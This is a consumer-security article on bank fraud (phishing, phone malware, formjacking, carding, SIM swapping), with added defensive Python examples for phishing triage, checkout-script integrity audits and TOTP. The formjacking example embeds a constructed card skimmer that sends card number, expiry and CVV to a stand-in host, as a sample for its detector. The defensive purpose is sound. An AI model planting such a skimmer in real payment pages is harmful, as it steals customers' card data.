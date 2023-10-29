Banks exist to hold our money and keep it safe. But it is not always like this: cybercriminals have many ways of getting at our banking details, sensitive data that is very attractive to attackers and a serious concern for those affected.

Payment services law requires banks to implement the security measures needed to "verify the identity of the payer": to make sure that the person making a transaction is the account holder and not someone acting without permission. The user, for their part, has the responsibility not to act negligently. That is not always the case, and cyber attackers take advantage of it.

Phishing: the most common deception

The type of attack in which fraudulent messages are sent to many users in the hope that someone takes the bait is known as 'phishing'. A classic example is the SMS impersonating the bank. Most of the users who receive it will simply ignore it, but some will believe it is genuine and decide to open the website it points to.

The aim of these SMS messages is to get us onto a website that imitates our bank's and to make us hand over confidential information, such as passwords or card details, believing it is the bank asking for it. The deception can be more or less credible: sometimes these messages include specific information about us that makes them more convincing.

Here we must remember that the bank will never ask us for information directly by SMS or e-mail. If the bank needs something from us, it either sends a registered letter or notifies us digitally, but the instruction will be to contact them or to check it ourselves, never through a link. The safe reflex is to ignore any link in such a message and reach the bank by typing its address or opening its official app.

In addition to our bank, phishing attacks also impersonate public bodies such as the Tax Agency, the Post Office or the Police, as well as companies with which we may have a paid service, such as Iberia, Microsoft or Amazon.

INCIBE's advice for avoiding phishing is to pay close attention to the communications we receive: make sure the sender's address really is the institution's, that the subject is not suspicious, that a QR code does not lead to a fake platform, that the spelling is correct and that the message is not generic. Above all, be suspicious whenever sensitive information is requested.
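The checks in that advice can be mechanised. The following is an added example written for this article, not code from the original page or from INCIBE: it triages a message against a hypothetical bank's allowlist of domains, flags lookalike or shortened links (including the URL decoded from a QR code), and flags requests for data a bank never asks for by SMS or e-mail. The bank domains, the keyword list and the two sample messages are constructed assumptions.

```python
"""Heuristic triage of a suspected bank phishing message.

Added example for this article, not code from the original page or from
INCIBE. The bank domains, keyword list and sample messages below are
constructed assumptions; adapt the allowlists to the real institution.
"""
import re
from urllib.parse import urlparse

# Domains the (hypothetical) bank really uses for web and e-mail.
LEGIT_DOMAINS = {"examplebank.es", "examplebank.com"}
# Brand strings that a lookalike domain would try to include.
BRAND_TOKENS = {"examplebank"}
# Services that hide the real destination of a link.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "cutt.ly"}
# Requests a real bank does not make by SMS or e-mail: (label, regex).
SENSITIVE_REQUESTS = [
    ("password", r"\bpassword\b"),
    ("PIN", r"\bpin\b"),
    ("CVV", r"\bcvv\b"),
    ("card number", r"\bcard number\b"),
    ("identity verification", r"\bverify your (account|identity)\b"),
]
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def registered_domain(host: str) -> str:
    """Crude registrable domain: the last two labels (enough for .es/.com here)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_url(url: str) -> list:
    """Red flags for a single link (from the message body or a decoded QR code)."""
    findings = []
    parsed = urlparse(url)
    host = parsed.hostname or ""
    reg = registered_domain(host)
    if IPV4_RE.fullmatch(host):
        findings.append(f"link points at a raw IP address: {host}")
    elif reg in SHORTENERS:
        findings.append(f"link shortener hides the destination: {host}")
    elif reg not in LEGIT_DOMAINS:
        if host.startswith("xn--") or ".xn--" in host:
            findings.append(f"punycode host, possible homograph: {host}")
        elif any(tok in host.replace("-", "") for tok in BRAND_TOKENS):
            findings.append(f"bank's name on a domain the bank does not own: {host}")
        else:
            findings.append(f"link to a domain unrelated to the bank: {host}")
    if parsed.scheme.lower() != "https":
        findings.append(f"link is not HTTPS: {url}")
    return findings


def triage(message: str, sender: str = None, qr_target: str = None) -> list:
    """Return the list of red flags found; an empty list means none were triggered."""
    findings = []
    if sender and "@" in sender:
        sender_domain = sender.rsplit("@", 1)[1].lower()
        if registered_domain(sender_domain) not in LEGIT_DOMAINS:
            findings.append(f"sender address is not the bank's: {sender_domain}")
    for url in URL_RE.findall(message):
        findings.extend(check_url(url))
    if qr_target:  # URL decoded from a QR code embedded in the message
        findings.extend(check_url(qr_target))
    lowered = message.lower()
    for label, pattern in SENSITIVE_REQUESTS:
        if re.search(pattern, lowered):
            findings.append(f"asks for sensitive data: {label}")
    return findings


# Constructed samples: one phishing SMS, one benign notice that carries no link.
PHISHING_SMS = ("ExampleBank: unusual access detected. Verify your identity at "
                "http://examplebank-secure-login.com/verify before 24h.")
BENIGN_NOTICE = "ExampleBank: you have a new document in your online banking inbox."

if __name__ == "__main__":
    for flag in triage(PHISHING_SMS):
        print("PHISHING?", flag)
    print("benign flags:", triage(BENIGN_NOTICE, sender="notices@examplebank.es"))
```

The registrable-domain logic is deliberately crude (last two labels), which is fine for `.es` and `.com` but would misjudge suffixes such as `.co.uk`; a real filter would use the public suffix list. The benign notice passes precisely because it contains no link and asks for nothing, which is what a genuine bank notification looks like.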

If it is too late and we have already fallen for it, the best thing is to contact the bank directly, explain what happened and have them take the necessary security measures, such as blocking the cards and resetting the access credentials.

Malware: watch what you install

Another way cyber attackers can get into our bank is by infecting the phone with some kind of malware. Here we must be careful not to install applications of unknown origin or download files from dubious sources.

Modern mobile operating systems already apply their own protections (app sandboxing, permission prompts and store-side scanning), so installing such programs is not that easy. If those protections are bypassed, though, the phone can be compromised and, for example, whatever is displayed on its screen can be seen by the criminals.

The access gained is almost total. Cybercriminals can read contacts and messages, access photos, files and location, record audio, take photos or videos, and even install other applications without our knowledge; for example, a keylogger that records keystrokes, that is, the passwords we type into the bank's website. Although the site itself is secure a priori, criminals can see what we type if they have compromised the phone: the data is captured before it leaves the device, so the encrypted connection to the bank does not help.

A more sophisticated one: 'formjacking'

This is a case where the user has no way of noticing the attack. Formjacking is often described as a 'man-in-the-middle' attack, although the interception happens inside the user's own browser: the technique consists of compromising a website's payment page, inserting malicious code that goes unnoticed and collects all the data entered into the form.

That is, the user pays on a website and everything works as it should. However, the operation has been compromised: in addition to the company, the cybercriminals also receive the banking details, such as the card number entered, CVV included, as we already saw with the Air Europa case.

Here the user is not negligent; it is the company that has been hacked. But rather than the company, the target of this hack is its users. With this method thousands of cards have been leaked, which has resulted in penalties of hundreds of thousands of euros.
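Since the user cannot detect it, the check has to run on the merchant's side. The following is an added example written for this article, not code from the original page nor from any of the companies it mentions: it computes Subresource Integrity hashes for the scripts served on a checkout page, compares them with a baseline recorded at deployment, and flags any script that now contacts a host outside an allowlist. The script bodies, paths, hostnames and baseline are constructed; the skimmer appended to the second sample is a minimal stand-in for the kind of code the paragraph describes.

```python
"""Integrity audit of the scripts served on a payment page, as a check against formjacking.

Added example for this article; it is not code from the original page nor from
any company mentioned in it. Script bodies, hostnames, paths and the baseline
are constructed for the illustration.
"""
import base64
import hashlib
import re
from urllib.parse import urlparse

# Hosts the checkout page is expected to contact (constructed allowlist).
ALLOWED_HOSTS = {"shop.example", "pay.example-psp.com"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body, usable in <script integrity="...">."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def foreign_hosts(content: bytes) -> list:
    """Hosts referenced inside the script that are not on the allowlist."""
    text = content.decode("utf-8", errors="replace")
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)


def audit(served: dict, baseline: dict) -> dict:
    """Compare the scripts served now against a known-good baseline.

    served:   {path: script bytes fetched from the live page}
    baseline: {path: expected 'sha384-...' value recorded at deployment}
    Returns {path: [findings]} containing only the scripts that raised something.
    """
    report = {}
    for path, body in served.items():
        findings = []
        expected = baseline.get(path)
        actual = sri_hash(body)
        if expected is None:
            findings.append("script is not in the baseline (unexpected addition)")
        elif actual != expected:
            findings.append(f"content changed: expected {expected}, got {actual}")
        for host in foreign_hosts(body):
            findings.append(f"script contacts a host outside the allowlist: {host}")
        if findings:
            report[path] = findings
    return report


# Constructed sample: the legitimate checkout script, and the same script with a
# skimmer appended that copies the card fields to a look-alike 'stats' host.
CLEAN_JS = b"""
document.getElementById('pay').addEventListener('submit', function () {
  fetch('https://pay.example-psp.com/tokenize', {method: 'POST'});
});
"""
SKIMMED_JS = CLEAN_JS + b"""
document.getElementById('pay').addEventListener('submit', function (e) {
  var f = e.target, d = {pan: f.pan.value, exp: f.exp.value, cvv: f.cvv.value};
  navigator.sendBeacon('https://cdn-stats-metrics.example/c', JSON.stringify(d));
});
"""
BASELINE = {"/static/checkout.js": sri_hash(CLEAN_JS)}


def run_demo() -> tuple:
    """Audit the clean page and the skimmed page; returns both reports."""
    clean = audit({"/static/checkout.js": CLEAN_JS}, BASELINE)
    skimmed = audit({"/static/checkout.js": SKIMMED_JS}, BASELINE)
    return clean, skimmed


if __name__ == "__main__":
    clean, skimmed = run_demo()
    print("clean page:", clean or "no findings")
    for path, flags in skimmed.items():
        print(path, "->", flags)
```

The same `sha384-...` value is what goes into the `integrity` attribute of the `<script>` tag, so a script modified after deployment is refused by the browser as well as flagged by the audit; restricting `connect-src` and `form-action` in the page's Content-Security-Policy closes the exfiltration route even if a script does change. Note that the audit only works if the baseline is kept somewhere the attacker cannot edit along with the site.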

With just your card number they can do a lot

You do not need every detail of the card to spend our money. Sometimes the number and some social engineering are enough. This is the scam known as 'carding': cybercriminals first obtain our card details and then use them fraudulently, so that we end up paying for their purchases.

The number is obtained from leaks caused by security breaches. Here we explain how to find out whether our passwords or personal data have been leaked online.

Fortunately, it is increasingly common for cards to require additional verification for online purchases, asking us to enter a one-time code or a password when the payment is made. Note, however, that when that code arrives by SMS its security rests on the phone number, which is exactly what the next technique attacks.

The dangers of SIM swapping

One of the banks' security mechanisms is to tie everything to our mobile phone: they send us an SMS to verify that it is really us. But another of the cybercriminals' techniques is 'SIM swapping'. Basically it consists of deceiving an employee at the operator's store into issuing a duplicate of our SIM by presenting a forged ID.

Once they have the duplicate SIM, they hold the key to our online banking and can reset the password by requesting the code by SMS. That message arrives at exactly the phone number we gave the bank, which with this method is now also in their hands. A warning sign on the victim's side is the phone suddenly losing coverage, since the original SIM stops working when the duplicate is activated.
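The weakness is that the second factor is bound to a phone number, which the operator can reassign, rather than to something only the victim's device holds. The following is an added example written for this article, not code from the original page nor from any bank or operator: it models the SMS code as going to whoever the operator currently maps the number to, and contrasts it with a time-based one-time code (RFC 6238 TOTP) generated from a secret that lives only in an authenticator app on the phone. The phone number, the 'SIM registry', the fixed timestamp and the attacker's guess are constructed; the secret is the RFC's published test secret so the code can be checked against its test vectors.

```python
"""Why an SMS code falls to SIM swapping and a device-bound TOTP code does not.

Added example for this article, not code from the original page nor from any
bank or operator. Phone numbers, the 'SIM registry' and the scenario are
constructed; the TOTP routine follows RFC 6238 and uses its published SHA-1
test secret so the output can be checked against the RFC's vectors.
"""
import hashlib
import hmac
import struct


# --- the SMS second factor: bound to a phone number, i.e. to whoever holds the SIM ---

def sms_code_recipient(sim_registry: dict, phone: str) -> str:
    """The bank texts the code to the number on file; it reaches whoever the
    operator currently maps that number to (the legitimate SIM or a duplicate)."""
    return sim_registry[phone]


# --- an app-based second factor: bound to a secret stored only on the device ---

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: dynamically truncated HMAC-SHA1 of the counter, zero-padded."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the number of 30-second steps since the Unix epoch."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret: bytes, code: str, at_time: int, step: int = 30, window: int = 1) -> bool:
    """Accept the code for the current step or one step either side (clock drift)."""
    return any(hmac.compare_digest(totp(secret, at_time + k * step, step), code)
               for k in range(-window, window + 1))


# --- constructed scenario ---
VICTIM_PHONE = "+34600000000"
APP_SECRET = b"12345678901234567890"  # RFC 6238 test secret; really it is provisioned once to the app
NOW = 1111111109                      # fixed timestamp from the RFC vectors, so runs are reproducible


def run_scenario() -> dict:
    registry = {VICTIM_PHONE: "victim"}
    before = sms_code_recipient(registry, VICTIM_PHONE)
    # Duplicate SIM issued against a forged ID: the operator now routes the number elsewhere.
    registry[VICTIM_PHONE] = "attacker"
    after = sms_code_recipient(registry, VICTIM_PHONE)

    victim_code = totp(APP_SECRET, NOW)  # generated on the victim's own phone
    attacker_guess = "123456"            # attacker has the number, not the secret
    return {
        "sms_code_before_swap_goes_to": before,
        "sms_code_after_swap_goes_to": after,
        "totp_victim_accepted": verify_totp(APP_SECRET, victim_code, NOW),
        "totp_attacker_accepted": verify_totp(APP_SECRET, attacker_guess, NOW),
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

With the RFC's secret, `totp(APP_SECRET, 59)` yields `287082` and `totp(APP_SECRET, 1111111109)` yields `081804` (the last six digits of the RFC's eight-digit vectors), which is how you confirm the implementation before trusting it. The design point is the one the article makes: after the swap the SMS code simply goes to the attacker, while the app code cannot be obtained from the operator at all because the secret never leaves the device.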

Here the responsibility lies with the operators. In 2022 the AEPD fined Movistar (900,000 euros), Orange (700,000 euros), MásMóvil (200,000 euros) and Vodafone (3,940,000 euros) for not applying sufficient measures to protect their customers from SIM swapping.

Banks also have responsibility

Although in some cases the error is the user's, the truth is that banks also bear a large part of the responsibility. Their position is that cases such as phishing amount to "gross negligence" on our part, and they refuse to accept the consequences. However, current case law holds that it is the bank that must answer for it and return the stolen amount to customers in phishing cases.

According to the Provincial Court, there is no gross negligence when a third party has set up a premeditated deception to win the victim's trust, and the bank for its part failed to prevent the phishing fraud.

Image | FLY:D

